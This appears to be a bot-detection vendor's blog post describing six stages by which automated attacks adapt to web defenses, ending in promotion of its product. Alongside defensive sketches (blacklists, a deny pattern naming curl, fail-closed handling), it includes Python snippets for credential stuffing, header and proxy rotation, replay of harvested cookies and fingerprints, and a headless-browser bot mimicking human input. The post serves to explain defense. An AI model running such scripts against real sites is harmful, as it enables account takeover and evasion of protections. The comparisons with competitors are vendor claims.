The dynamics of bot attacks
A wealth of information, personal data, and services is available online. On average, Google processes over 40,000 searches every second. If in need of information, one now checks the web before considering a visit to the nearest library. Social media and publicly available data have made it easier than ever to gather information about individuals. We no longer need to go out to buy essentials or to manage finances. As more and more businesses move online, more opportunities become available to attackers. I’ve worked on defending sites against automated and human-driven attacks for over 10 years, and although the techniques used to defend businesses have evolved significantly, so have the attack methods.
Back in the day, rate control, blacklists, and a handful of nicely crafted rules were pretty much all you needed to successfully defend against attacks. Surprisingly, these techniques can actually still work, but not for long.
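As a rough illustration, that "old school" defense could be as simple as the following sketch, where the blacklist entries, the user-agent rule, and the rate limit are all hypothetical values:

```python
import re
import time
from collections import defaultdict

# Hypothetical static defenses: an IP blacklist, a user-agent rule, and a rate limit.
BLACKLISTED_IPS = {"203.0.113.7", "198.51.100.23"}
BAD_UA_PATTERN = re.compile(r"curl|python-requests|scrapy", re.IGNORECASE)
MAX_REQUESTS_PER_MINUTE = 30

_request_log = defaultdict(list)  # ip -> list of request timestamps


def allow_request(ip: str, user_agent: str) -> bool:
    """Return True if the request passes the basic checks described above."""
    if ip in BLACKLISTED_IPS:
        return False
    if BAD_UA_PATTERN.search(user_agent or ""):
        return False

    # Sliding-window rate control: keep only the last 60 seconds of requests.
    now = time.time()
    window = [t for t in _request_log[ip] if now - t < 60]
    window.append(now)
    _request_log[ip] = window
    return len(window) <= MAX_REQUESTS_PER_MINUTE
```

Checks like these are trivially effective against a single unmodified script, which is exactly why they stop working as soon as the attacker adapts.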
Let me explain: the sophistication of an attack is typically proportional to the defense in place, but also to the value of the data or goods collected as a result of a successful attack. If a site has no protection in place, an attacker has no incentive to deploy a more costly botnet spanning thousands of nodes across multiple continents, with techniques designed to defeat bot detection. In this case, a simple curl script from a single machine will do.
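That curl-style attack really is about this simple. The sketch below is illustrative only; the endpoint, form fields, and credential file are made up:

```python
import requests

# A naive credential-stuffing loop from a single machine: one IP,
# one default user-agent, no JavaScript, no attempt to hide.
TARGET = "https://example.com/login"   # hypothetical endpoint

with open("combos.txt") as f:          # hypothetical username:password list
    for line in f:
        username, password = line.strip().split(":", 1)
        resp = requests.post(TARGET, data={"user": username, "pass": password})
        if resp.status_code == 200 and "Welcome" in resp.text:
            print("hit:", username)
```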
However, as soon as the site administrator starts to put some defenses in place, the game is on and things can evolve rapidly! Having worked for a couple of vendors who offer bot detection products, and having traded information with other vendors in the space, I’ve seen that the way an attack evolves is typically the same.
The six stages of a bot attack
Bot detection has become more modern and sophisticated in response to automated attacks, and cybercriminals continuously study these defense mechanisms, looking for ways to keep their large-scale attacks viable. An attack launched by a bad actor typically progresses through the following stages.
Stage 1 - Introduction of a web security product. At this stage, the site administrator updates the workflow of their most critical endpoint and introduces a web security product. Existing bots attacking the site will be immediately detected with 100% accuracy, simply because most botnets at that stage are scripts designed to do a particular task and tailored to follow a given workflow (for example, creating an account or logging in). The change introduced into the workflow by the web security product is not part of the default bot script.
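For instance, if the security product injects a new required step into the login workflow, the server-side check might look roughly like this sketch; the token field, validator, and return codes are all hypothetical:

```python
def verify_challenge_token(token: str) -> bool:
    """Stand-in for the security product's server-side token validation."""
    return token == "expected-proof-of-challenge"   # placeholder logic


def handle_login(form: dict) -> int:
    """Hypothetical login handler after the security product is introduced."""
    # The product injects a challenge token into the login page, and the
    # server now requires it on submit. A pre-existing bot script that only
    # posts {"user": ..., "pass": ...} never sends this field and fails here.
    token = form.get("challenge_token", "")
    if not verify_challenge_token(token):
        return 403
    # ... existing authentication logic would run here ...
    return 200
```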
Stage 2 - Scaling the botnet and impersonating browsers' signatures. Most basic bot defenses consist of rate control, IP blacklists, or rules that match the bot's signature, such as the user-agent. To defeat these basic techniques, bot operators will quickly scale their botnet to thousands of nodes, hosted across cloud providers in several countries. They will also randomize their HTTP header signature (mostly the user-agent).
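A sketch of what that randomization might look like on a single node; the user-agent strings and proxy addresses are placeholders:

```python
import random
import requests

# Hypothetical pools the operator distributes across thousands of cloud nodes.
USER_AGENTS = [
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/120.0 Safari/537.36",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 Version/17.0 Safari/605.1.15",
    "Mozilla/5.0 (X11; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0",
]
PROXIES = ["http://203.0.113.10:8080", "http://198.51.100.44:8080"]  # placeholder exit nodes


def attack_request(url: str, payload: dict) -> requests.Response:
    """Send one request with a randomized signature, defeating static
    user-agent rules and spreading rate-limit counters across many IPs."""
    headers = {"User-Agent": random.choice(USER_AGENTS)}
    proxy = random.choice(PROXIES)
    return requests.post(url, data=payload,
                         headers=headers,
                         proxies={"http": proxy, "https": proxy},
                         timeout=10)
```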
Stage 3 - Reverse engineering and replay. Of course, as soon as the bot operators realize that the attack continues to fail, they will re-evaluate the workflow. They will look for signs of web security protection and study it. That’s when the time comes for replays. The attacker will identify the type of information being collected by the product, then update the script to include a “good fingerprint”, or try various combinations, randomly changing some data points and evaluating the result. If the product uses some sort of persistent ID or cookie, the attacker will also attempt to harvest them from legitimate sessions and replay them from a botnet.
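A replay-and-mutate probe might look something like the sketch below; the fingerprint fields, cookie name, and endpoint are invented for illustration:

```python
import copy
import random
import requests

# A fingerprint payload harvested from a legitimate browser session
# (field names here are invented for illustration).
GOOD_FINGERPRINT = {
    "screen": "1920x1080",
    "timezone": "America/New_York",
    "webgl_hash": "a3f9c1",
    "plugins": 5,
}
HARVESTED_COOKIE = {"device_id": "replayed-from-a-real-session"}


def replay_attempt(url: str) -> int:
    """Replay the harvested data, mutating one data point at a time
    to probe which fields the detection product actually checks."""
    fp = copy.deepcopy(GOOD_FINGERPRINT)
    field = random.choice(list(fp))
    if isinstance(fp[field], int):
        fp[field] += random.choice([-1, 1])
    resp = requests.post(url, json={"fingerprint": fp},
                         cookies=HARVESTED_COOKIE, timeout=10)
    return resp.status_code  # compare outcomes across mutations
```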
Stage 4 - Force the web security product to fail open. Failing to defeat the detection through replay, the most persistent attackers will try sending malformed data to see if it triggers some sort of exception. After all, bot operators are developers too, and they know that software exceptions can cause the product to “fail open”, which in effect disables the defense. They also know that detection engines don’t have infinite capacity and that the fail-open mechanism may trigger if the engine is overwhelmed with traffic. This last option can be a risky bet for the attacker, though, as they need to be careful not to take down their target in the process, otherwise it’s game over.
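From the defender's side, this stage is the argument for failing closed (or at least failing to a challenge) rather than failing open. A minimal sketch of that policy, with a hypothetical `detect()` call standing in for the detection engine:

```python
def detect(request_data: dict) -> bool:
    """Stand-in for the detection engine; may raise on malformed input
    or time out under load."""
    if "fingerprint" not in request_data:
        raise ValueError("malformed payload")
    return request_data["fingerprint"] == {}   # placeholder verdict: True = bot


def decide(request_data: dict) -> str:
    """Never let an exception or overload silently disable the defense."""
    try:
        is_bot = detect(request_data)
    except Exception:
        # Fail closed: treat errors triggered by malformed or excessive
        # traffic as suspicious and challenge, instead of letting them through.
        return "challenge"
    return "block" if is_bot else "allow"
```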
Stage 5 - Upgrade the botnet to a headless browser. Products like Selenium or headless Chrome can be used to build a more intelligent botnet that can run JavaScript and be programmed to simulate human behavior, all the way down to key presses, mouse movements, and clicks.
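A sketch of what one such bot node might look like with Selenium driving headless Chrome; the target URL, field name, and typed value are hypothetical, and a real operator would layer on far more evasion:

```python
import random
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.common.by import By
from selenium.webdriver.common.action_chains import ActionChains

options = Options()
options.add_argument("--headless=new")          # run Chrome without a visible window
driver = webdriver.Chrome(options=options)

driver.get("https://example.com/login")         # hypothetical target
email_field = driver.find_element(By.NAME, "email")

# Simulate human-like interaction: move the mouse to the field, click,
# then type character by character with small random pauses.
actions = ActionChains(driver)
actions.move_to_element(email_field).pause(random.uniform(0.2, 0.6)).click()
for char in "victim@example.com":
    actions.send_keys(char).pause(random.uniform(0.05, 0.2))
actions.perform()

driver.quit()
```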
Stage 6 - Give up the botnet, move on to manual attack. If all attack techniques against the bot detection feature of the product fail, certain types of attacks may still be cost-effective when carried out manually. In this case, more advanced techniques that take advantage of IP intelligence, device intelligence, user contextual information, knowledge of sweatshop centers, and behavioral detection methods are required to successfully differentiate between legitimate and suspicious human traffic.
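As a rough illustration of how such signals might be combined on the defense side, consider the sketch below; the signal names, weights, and thresholds are entirely made up:

```python
def classify_session(ip_reputation: float,
                     device_risk: float,
                     behavior_risk: float,
                     known_sweatshop_asn: bool) -> str:
    """Combine hypothetical risk signals (each scaled 0.0-1.0) into a verdict:
    'human', 'suspect_human', or 'automated'."""
    score = 0.35 * ip_reputation + 0.30 * device_risk + 0.35 * behavior_risk
    if known_sweatshop_asn:
        score = min(1.0, score + 0.2)

    if score < 0.3:
        return "human"
    if score < 0.7:
        return "suspect_human"
    return "automated"
```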
The bottom line
The detection methods used at each stage work together to differentiate between automated, suspect human, automated/human hybrid, and legitimate human traffic. Challenging all suspicious traffic with the right level of pressure will discourage the bot operator from continuing their attack or make it cost-prohibitive. Each stage of the attack requires an increasing level of skill. Many attackers will give up, either because they do not have the expertise or because the ROI is simply too low and they would rather target an easier, less protected website, or one known to be running a legacy captcha solution that hasn’t evolved with attack methods.
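Continuing the earlier sketch, that "right level of pressure" can be expressed as a simple mapping from traffic classification to response; the categories mirror the text above, while the specific responses are illustrative:

```python
# Illustrative policy: escalate friction with suspicion, keeping legitimate
# humans untouched while making sustained attacks increasingly expensive.
RESPONSE_BY_CLASS = {
    "human": "allow",                    # no friction for legitimate users
    "suspect_human": "interactive_challenge",
    "hybrid": "interactive_challenge",   # automated/human hybrid traffic
    "automated": "block_or_hard_challenge",
}


def respond(classification: str) -> str:
    """Return the response tier for a classified session; default to a
    challenge rather than an outright allow for anything unknown."""
    return RESPONSE_BY_CLASS.get(classification, "interactive_challenge")
```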
Advanced solutions to mitigate attacks
Unlike legacy captcha solutions where data is a “black box,” Arkose Bot Manager provides multi-layered detection with real-time insights to improve catch rates and ensure consumers’ account security. It can accurately tell attackers from genuine consumers, quickly adapt to evolving bot- and human-driven attacks, and make more confident response decisions.
Being able to make quick, efficient decisions is imperative in today’s attack landscape, where intelligent bots are wreaking havoc, yet many businesses get little to no visibility out of the limited signals provided by legacy solutions like Google reCAPTCHA. Factors like the lack of device spoofing detection, the absence of distributed crawler detection, basic machine learning models, and no truth data or real-time logging limit reCAPTCHA’s ability to spot malicious activity, especially as attackers become more adept at manipulating risk signals.